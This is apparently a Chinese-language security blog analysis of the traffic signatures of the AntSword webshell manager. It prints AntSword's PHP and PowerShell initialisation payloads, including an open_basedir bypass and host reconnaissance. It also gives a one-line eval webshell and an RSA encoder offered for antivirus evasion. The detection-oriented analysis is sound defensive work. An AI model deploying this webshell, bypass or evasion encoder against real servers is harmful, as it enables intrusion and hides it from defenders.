蚁剑流量特征

初始化代码

PHP 连接类型

抓取测试连接的数据包,默认不编码

可以看到只发起了一个请求

追踪数据流

这里就拿到了初始化的代码部分

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
if (!function_exists("get_magic_quotes_gpc")) {
    function get_magic_quotes_gpc() {
        return 0;
    }
}

// 绕过 open_basedir 限制
$opdir = @ini_get("open_basedir");
if ($opdir) {
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr = preg_split(base64_decode("Lzt8Oi8="), $opdir);  // base64_decode("Lzt8Oi8=")  -> "/;|://"
    @array_push($oparr, $ocwd, sys_get_temp_dir());
    foreach ($oparr as $item) {
        if (!@is_writable($item)) {
            continue;
        }
        $tmdir = $item . "/.aefa96";
        @mkdir($tmdir);
        if (!@file_exists($tmdir)) {
            continue;
        }
        $tmdir = realpath($tmdir);
        @chdir($tmdir);
        @ini_set("open_basedir", "..");
        $cntarr = @preg_split("/\\\\|\/\//", $tmdir);
        for ($i = 0; $i < sizeof($cntarr); $i++) {
            @chdir("..");
        }
        @ini_set("open_basedir", "/");
        @rmdir($tmdir);
        break;
    }
}

// 输出编码函数(此处未编码,直接返回)
function asenc($out) {
    return $out;
}

// 输出包装函数
function asoutput() {
    $output = ob_get_contents();
    ob_end_clean();
    echo "b6f" . "1bd0";
    echo @asenc($output);
    echo "d695" . "5898";
}

ob_start();
try {
    $D = dirname($_SERVER["SCRIPT_FILENAME"]);
    if ($D == "") $D = dirname($_SERVER["PATH_TRANSLATED"]);
    $R = "{$D}\t";
    if (substr($D, 0, 1) != "/") {
        foreach (range("C", "Z") as $L) if (is_dir("{$L}:")) $R .= "{$L}:";
    } else {
        $R .= "/";
    }
    $R .= "\t";
    $u = (function_exists("posix_getegid")) ? @posix_getpwuid(@posix_geteuid()) : "";
    $s = ($u) ? $u["name"] : @get_current_user();
    $R .= php_uname();
    $R .= "\t{$s}";
    echo $R;
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
}
asoutput();
die();
?>

环境准备

关闭错误显示以及取消执行时间限制

1
2
@ini_set("display_errors", "0");
@set_time_limit(0);

下面函数在 PHP 5.4 以后已废弃

1
2
3
if (!function_exists("get_magic_quotes_gpc")) {
    function get_magic_quotes_gpc() { return 0; }
}

绕过 open_basedir

open_basedir 是 PHP 的安全限制,约束文件操作只能在指定目录内

比如,在 Nginx/Apache 的 PHP 配置里设置

1
php_admin_value open_basedir "/var/www/:/tmp/"

那么该站点下的所有 PHP 脚本就只能读写 /var/www//tmp/ 这两个目录

但如果是

1
php_value open_basedir "/var/www/:/tmp/"

则可以绕过

绕过思路如下:

  1. 获取当前 open_basedir 值,并与当前脚本目录、系统临时目录合并为一个数组

  2. 逐个检查这些目录是否可写

  3. 在可写目录下创建隐藏文件夹 .aefa96,进入该目录(例如 /var/www/.aefa96

  4. 执行 ini_set("open_basedir", "..") 将限制改为上级目录

  5. 通过切chdir("..") 回到上次目录(/var/www

  6. 多次重复操作回到根目录

  7. 最后直接设置 open_basedir"/",完全解除限制

输出编码函数

asenc() 直接返回原字符串

asoutput() 将输出包裹在特征字符串 b6f1bd0d6955898 之间

1
2
3
4
5
6
7
8
function asenc($out) { return $out; }
function asoutput() {
    $output = ob_get_contents();
    ob_end_clean();
    echo "b6f" . "1bd0";
    echo @asenc($output);
    echo "d695" . "5898";
}

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
// 获取当前脚本所在目录
$D = dirname($_SERVER["SCRIPT_FILENAME"]);
...
$R = "{$D}\t";
// Windows 下枚举盘符 C: D: ...
if (substr($D, 0, 1) != "/") { ... }
else { $R .= "/"; }
// 获取当前用户名
$u = ... ; $s = ... ;
// 系统信息
$R .= php_uname();
$R .= "\t{$s}";

异常处理

若信息收集出错,返回错误信息,但依然会被 asoutput() 包裹

1
2
3
catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
}

PSWINDOWS 连接类型

1
powershell -nop -enc "编码"

解码得到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
$TAGS=[System.String]::Concat('248','edb');  # 前缀 248edb
$TAGE=[System.String]::Concat('a77','2fe');  # 后缀 a772fe

function asenc() {
    param ([System.String] $s)
    return $s;
};

function asexec() {
    $ret='';
    $Tab=[char]9;
    $ACWD=$pwd.Path;                                              # 当前目录
    $AUSER=[System.Security.Principal.WindowsIdentity]::GetCurrent().Name;  # 当前用户名
    $AUNAME=[System.Environment]::OSVersion.VersionString;        # 系统版本
    $ADRIVERS='';
    $c=[System.IO.DriveInfo]::GetDrives();
    for($i=0;$i -lt $c.Length;$i++){
        if($c[$i].DriveType -eq 3){                               # 固定磁盘
            $ADRIVERS+=$c[$i].Name.Substring(0,2);               # 取盘符如 C:
        }
    };
    $ret=$ACWD+$Tab+$ADRIVERS+$Tab+$AUNAME+$Tab+$AUSER;
    return $ret;
};

$RESP='';
try{
    $RESP=asenc(asexec);
}catch{
    $RESP=asenc([System.String]::Format('ERROR:// {0}',$_.ToString()));
};
[System.String]::Format('{0}{1}{2}',$TAGS,$RESP,$TAGE);

PHPRAW 连接类型

与普通 PHP 没有区别,但是必须在 “其它设置” 里勾选「Body 设置为 RAW 模式」

1
2
3
4
<?php
    // 从 php://input 读取原始 HTTP Body,直接 eval 执行
    @eval(file_get_contents("php://input"));
?>

数据分隔符

1
2
$TAGS=[System.String]::Concat('248','edb');  # 前缀 248edb
$TAGE=[System.String]::Concat('a77','2fe');  # 后缀 a772fe

编码函数

1
2
3
4
function asenc() {
    param ([System.String] $s)
    return $s;
};

信息收集函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
function asexec() {
    $ret='';
    $Tab=[char]9;      # Tab 字符作为分隔符
    $ACWD=$pwd.Path;   # 当前 PowerShell 的工作目录(通常是 Webshell 所在目录)
    
    # 当前登录的 Windows 用户身份
    $AUSER=[System.Security.Principal.WindowsIdentity]::GetCurrent().Name;
    
    # 操作系统版本(例如 "Microsoft Windows NT 10.0.19045.0")
    $AUNAME=[System.Environment]::OSVersion.VersionString;
    
    # 获取所有驱动器
    $ADRIVERS='';
    $c=[System.IO.DriveInfo]::GetDrives();
    for($i=0;$i -lt $c.Length;$i++){
        if($c[$i].DriveType -eq 3){          # 3 表示 Fixed 类型(固定硬盘)
            $ADRIVERS+=$c[$i].Name.Substring(0,2);  # 取盘符的前两个字符,如 "C:"
        }
    };
    
    # 用 Tab 拼接所有信息
    $ret=$ACWD+$Tab+$ADRIVERS+$Tab+$AUNAME+$Tab+$AUSER;
    return $ret;
}

错误捕获与输出

1
2
3
4
5
6
7
8
9
$RESP='';
try{
    $RESP=asenc(asexec);   # 正常执行并获取信息
}catch{
    # 如果出现异常,返回错误信息
    $RESP=asenc([System.String]::Format('ERROR:// {0}',$_.ToString()));
};
# 最终输出:前缀 + 信息字符串 + 后缀
[System.String]::Format('{0}{1}{2}',$TAGS,$RESP,$TAGE);

编码解码器

接下来我们统一使用 Base64 编码去看具体的流量特征

可以发现流量都被 Base64 加密了

Body 为 RAW 模式

勾选这个选项进行测试

没什么区别,但是返回数据为空

分析源码得出以下结论:

  • RAW 模式发送的为纯 PHP 代码

  • 服务端必须通过 file_get_contents("php://input") 等读取原始请求流

1
2
3
4
<?php
    // 从 php://input 读取原始 HTTP Body,直接 eval 执行
    @eval(file_get_contents("php://input"));
?>

使用随机英文单词变量

好像没什么变化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
@ini_set("display_errors", "0");
@set_time_limit(0);
if(!function_exists("get_magic_quotes_gpc")){
    function get_magic_quotes_gpc(){
        return 0;
    }
};
$opdir=@ini_get("open_basedir");
if($opdir) {
    $ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);
    @array_push($oparr,$ocwd,sys_get_temp_dir());
    foreach($oparr as $item) {
        if(!@is_writable($item)){continue;};
        $tmdir=$item."/.3c837";
        @mkdir($tmdir);
        if(!@file_exists($tmdir)){continue;}
        $tmdir=realpath($tmdir);
        @chdir($tmdir);
        @ini_set("open_basedir", "..");
        $cntarr=@preg_split("/\\\\|\//",$tmdir);
        for($i=0;$i<sizeof($cntarr);$i++){
            @chdir("..");
        };
        @ini_set("open_basedir","/");
        @rmdir($tmdir);
        break;
    };
};
function asenc($out){
    return $out;
};
function asoutput(){
    $output=ob_get_contents();
    ob_end_clean();
    echo "6ccd"."453e3";
    echo @asenc($output);
    echo "f857"."845b5";
}
ob_start();
try{
    $D=dirname($_SERVER["SCRIPT_FILENAME"]);
    if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
    $R="{$D}\t";
    if(substr($D,0,1)!="/"){
        foreach(range("C","Z") as $L) if(is_dir("{$L}:")) $R.="{$L}:";
    }else{
        $R.="/";
    }
    $R.="\t";
    $u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
    $s=($u)?$u["name"]:@get_current_user();
    $R.=php_uname();
    $R.="\t{$s}";
    echo $R;;
}catch(Exception $e){
    echo "ERROR://".$e->getMessage();
};
asoutput();
die();

但是在会话中可以抓取流量包看到固定参数全部随机化了

增加垃圾数据

勾选选项

可以看到请求 Body 多了垃圾数据

以及在会话中会时不时的去访问随机文件

自定义数据分隔符

RSA 加密

来到 RSA 加密这里

点击生成,然后下面给出的代码就是 WebShell

新疆一个系统自带的 PHP RSA 编码器

编辑数据修改编码器为刚刚创建的,测试连接成功

抓包可以看到流量默认以 ant 开头,这个可以在 WebShell 代码中修改隐藏,但是特征很难改掉

附赠一波基于 PSWINDOWS 免杀的编码器

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
'use strict';

module.exports = (pwd, data, ext = {}) => {
    const rawPayload = data['_'];
    const n = Math.ceil(rawPayload.length / 80);
    const blockLen = Math.ceil(rawPayload.length / n);
    const blocks = [];

    for (let i = 0; i < n; i++) {
        const block = rawPayload.substr(i * blockLen, blockLen);
        // 使用私钥加密,输出 Base64
        blocks.push(ext['rsa'].encryptPrivate(block, 'base64'));
    }

    data[pwd] = blocks.join('|');
    delete data['_'];
    return data;
}